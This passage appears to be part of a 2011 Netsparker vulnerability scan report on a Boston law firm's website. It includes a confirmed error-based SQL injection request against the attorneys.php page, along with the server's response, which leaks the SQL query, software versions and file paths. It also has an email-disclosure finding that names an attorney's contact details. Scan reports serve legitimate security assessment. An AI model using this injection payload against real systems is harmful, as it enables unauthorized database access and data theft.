href="http://www.nutter.com/attorneys.php?letter=N">N</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=O">O</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=P">P</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Q">Q</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=R">R</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=S">S</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=T">T</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=U">U</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=V">V</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=W">W</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=X">X</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Y">Y</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Z">Z</a></div><form method="post" action="http://www.nutter.com/attorneys.php"> <table cellpadding="0" cellspacing="0" id="Form"> <tr> <td><label for="FirstName">First Name</label></td> <td><input type="text" name="FirstName" value="" id="FirstName"/></td> <td><label for="LastName">Last Name</label></td> <td><input type="text" name="LastName" value="" id="LastName"/></td> <td></td> </tr> <tr> <td><label for="Keywords">Keywords</label></td> <td colspan="3"><input type="text" name="Keyword" value="" id="Keywords"/></td> <td><input type="image" src="/media/images/attorney_go_button.gif" name="Submit" id="Go"/></td> </tr> </table> <div id="subMenus"> <ul id="menuList"> <li> <a href="javascript:void(0)" title="Practice Area" id="Practice" class="subLinks">Practice Area</a> <ul class="subCategoriesScroll" onmouseover="colorItem('Practice', 'subHover')" onmouseout="colorItem('Practice', 'subLinks')"> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=2" title="Antitrust">Antitrust</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=3" title="Banking and Financial Services">Banking and Financial Services</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=5" title="Business/General Corporate">Business/General Corporate</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=6" title="Commercial Finance">Commercial Finance</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=7" title="Education">Education</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=8" title="Emerging Companies/High Technology">Emerging Companies/High Technology</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=37" title="Energy Law">Energy Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=10" title="Environmental Law">Environmental Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=11" title="Government Investigations and White Collar Defense">Government Investigations and White Collar Defense</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=13" title="Hedge Funds">Hedge Funds</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=15" title="Intellectual Property">Intellectual Property</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=16" title="IP Litigation">IP Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=9" title="Labor, Employment and Benefits">Labor, Employment and Benefits</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=17" title="Land Use, Permitting and Development">Land Use, Permitting and Development</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=19" title="Litigation">Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=34" title="Litigation: Data Security Breach and Privacy">Litigation: Data Security Breach and Privacy</a></li> <li><a href="http://www.nutter.c..
MySQL Database Identified

MySQL Database Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /attorneys.php

/attorneys.php CONFIRMED

http://www.nutter.com/attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(..

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nutter.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:11:39 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Transfer-Encoding: chunked
Content-Type: text/html


error: Duplicate entry '_!@4dilemma:1' for key 1 | 1062<BR>sql: SELECT FirstName,LastName FROM attorneys WHERE AttorneyID=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))<br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /usr/local/apache/pnc_nutter/pointclique/maintenance/_libs/lib.php:68) in <b>/usr/local/apache/htdocs/attorneys.php</b> on line <b>16</b><br /><!-- attorneys start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Attorneys : Nutter McClennen & Fish LLP--> <title>Attorneys : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.attorneys.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.attorneys.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start -->
<div id="printHeader">
<img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/>
</div>
<div id="bodyContainer">
<div id="headerArea">
<ul>
<li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li>
<li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li>
<li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li>
</ul>
<form method="get" id="searchField" action="http://www.nutter.com/search.php">
<div id="siteSearch">
<input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/>
</div>
</form>
</div>
<!-- header end -->
<!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent">
<ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.209.jpg" width="450" height="124" id="smallImage"><h2><img src="/media/aboutus/media.226.gif" border="0" title="" alt=""></h2><span><img src="http://www.nutter.com/media/images/search_for_an.gif" alt="Search For An Attorney"/></span><div id="Alpha"><a href="http://www.nutter.com/attorneys.php?letter=A">A</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=B">B</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=C">C</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=D">D</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=E">E</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=F">F</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=G">G</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=H">H</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=I">I</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=J">J</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=K">K</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=L">L</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=M">M</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=N">N</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=O">O</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=P">P</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Q">Q</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=R">R</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=S">S</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=T">T</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=U">U</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=V">V</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=W">W</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=X">X</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Y">Y</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Z">Z</a></div><form method="post" action="http://www.nutter.com/attorneys.php"> <table cellpadding="0" cellspacing="0" id="Form"> <tr> <td><label for="FirstName">First Name</label></td> <td><input type="text" name="FirstName" value="" id="FirstName"/></td> <td><label for="LastName">Last Name</label></td> <td><input type="text" name="LastName" value="" id="LastName"/></td> <td></td> </tr> <tr> <td><label for="Keywords">Keywords</label></td> <td colspan="3"><input type="text" name="Keyword" value="" id="Keywords"/></td> <td><input type="image" src="/media/images/attorney_go_button.gif" name="Submit" id="Go"/></td> </tr> </table> <div id="subMenus"> <ul id="menuList"> <li> <a href="javascript:void(0)" title="Practice Area" id="Practice" class="subLinks">Practice Area</a> <ul class="subCategoriesScroll" onmouseover="colorItem('Practice', 'subHover')" onmouseout="colorItem('Practice', 'subLinks')"> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=2" title="Antitrust">Antitrust</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=3" title="Banking and Financial Services">Banking and Financial Services</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=5" title="Business/General Corporate">Business/General Corporate</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=6" title="Commercial Finance">Commercial Finance</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=7" title="Education">Education</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=8" title="Emerging Companies/High Technology">Emerging Companies/High Technology</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=37" title="Energy Law">Energy Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=10" title="Environmental Law">Environmental Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=11" title="Government Investigations and White Collar Defense">Government Investigations and White Collar Defense</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=13" title="Hedge Funds">Hedge Funds</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=15" title="Intellectual Property">Intellectual Property</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=16" title="IP Litigation">IP Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=9" title="Labor, Employment and Benefits">Labor, Employment and Benefits</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=17" title="Land Use, Permitting and Development">Land Use, Permitting and Development</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=19" title="Litigation">Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=34" title="Litigation: Data Security Breach and Privacy">Litigation: Data Security Breach and Privacy</a></l..
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /attorneys.php

/attorneys.php

http://www.nutter.com/attorneys.php?AttorneyID=79

Found E-mails

jkotlier@nutter.com

Request

GET /attorneys.php?AttorneyID=79 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nutter.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:09:20 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!-- attorneys start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Jonathan L. Kotlier : Attorneys : Nutter McClennen & Fish LLP--> <title>Jonathan L. Kotlier, Partner: Attorney Litigation Department: Government Enforcement Defense: Boston</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="Jonathan L. Kotlier partner Attorney Litigation Department Government Enforcement Defense practice U.S. Attorney Office Chief Economic Crimes Massachusetts white collar criminal cases securities investor computer crimes telemarketing fraud" /> <meta name="description" content="Jonathan L. Kotlier is a partner, Attorney in the Litigation Department and a member of the Government Enforcement Defense practice group. From U.S. Attorney�s Office, he was Chief of Economic Crimes Unit for the District of Massachusetts." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.attorneys.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.attorneys.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start -->
<div id="printHeader">
<img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/>
</div>
<div id="bodyContainer">
<div id="headerArea">
<ul>
<li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li>
<li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li>
<li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li>
</ul>
<form method="get" id="searchField" action="http://www.nutter.com/search.php">
<div id="siteSearch">
<input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/>
</div>
</form>
</div>
<!-- header end -->
<!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent">
<div id="Information"> <img src="http://www.nutter.com/media/attorneys/media.75.jpg" title="Jonathan L. Kotlier" alt="Jonathan L. Kotlier"/> <h2 id="Name">Jonathan L. Kotlier</h2> <p> <span id="attTitle">Partner </span> Seaport West
<br/>155 Seaport Boulevard<br /><span id="Address">Boston, MA 02210</span> <span>617-439-2683 Fax: 617-310-9683</span> <span><a href="email.php?email=jkotlier@nutter.com" title="jkotlier@nutter.com" target="emailnotice" onclick="emailNotice();">jkotlier@nutter.com</a></span> <a href="email.php?email=jkotlier@nutter.com" title="jkotlier@nutter.com" target="emailnotice" onclick="emailNotice();" class="Email"><span>jkotlier@nutter.com</span></a> <span><a href="vcard.php?AttorneyID=79" title="V-Card" id="vCard">V-card</a></span> </p></div><h3 id="Focus"> <span id="Title">Areas of focus:</span> <span id="Desc"><a href="http://www.nutter.com/client_services.php?PracticeID=19">Litigation</a> and <a href="http://www.nutter.com/client_services.php?PracticeID=11">Government Investigations and White Collar Defense</a></span> <img src="http://www.nutter.com/media/images/print_backbar_blue.gif" id="bgFocus"/></h3><div id="Related"><h4>EDUCATION</h4><ul class="noBullets"><li>Boston University School of Law, J.D.</li><li>University of Chicago, M.A.</li><li>University of Pennsylvania, B.A.</li></ul><h4>ACCOLADES</h4><ul id="Accolades" class="noBullets"><li>Massachusetts Super Lawyer, 2005-2010</li><li>Super Lawyers, Corporate Counsel Edition, 2009 & 2010</li><li>The Best Lawyers in America, 2008-2011</li><li>Member, Judicial Nominating Commission, by appointment of Governor Deval L. Patrick (2008 - )</li></ul><h4>ADMISSIONS</h4><ul class="noBullets"><li>Massachusetts</li><li>New York</li><li>Pennsylvania</li></ul><h4>ARTICLES &amp; EVENTS</h4><ul><li><a href="http://www.nutter.com/publications_events.php?NewsID=1215" title="Jonathan Kotlier participates in ABA's panel �How to Handle a Government Subpoena� at the Business Law Section 2011 Spring Meeting">Jonathan Kotlier participates in ABA's panel �How to Handle a Government Subpoena� at the Business Law Section 2011 Spring Meeting<br /></a></li><li><a href="http://www.nutter.com/publications_events.php?NewsID=1207" title="Jonathan Kotlier and Ian Roffman participate in BBA�s program �Securities Enforcement: What's Up at the SEC: Whistleblowing, Insider Trading, and the FCPA�">Jonathan Kotlier and Ian Roffman participate in BBA�s program �Securities Enforcement: What's Up at the SEC: Whistleblowing, Insider Trading, and the FCPA�<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=1156" title="Jonathan Kotlier moderates BBA panel �Meet the Massachusetts Securities Division�">Jonathan Kotlier moderates BBA panel �Meet the Massachusetts Securities Division�<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=1050" title="Jonathan Kotlier appointed co-chair of the Boston Bar Association�s Criminal Justice Section">Jonathan Kotlier appointed co-chair of the Boston Bar Association�s Criminal Justice Section<br /></a></li><li class="temp_articles"><a 